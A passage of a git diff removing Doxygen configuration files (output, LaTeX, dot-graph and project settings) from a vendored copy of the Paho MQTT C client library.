-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI
deleted file mode 100644
index 7026856..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI
+++ /dev/null
@@ -1,1803 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTClient/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
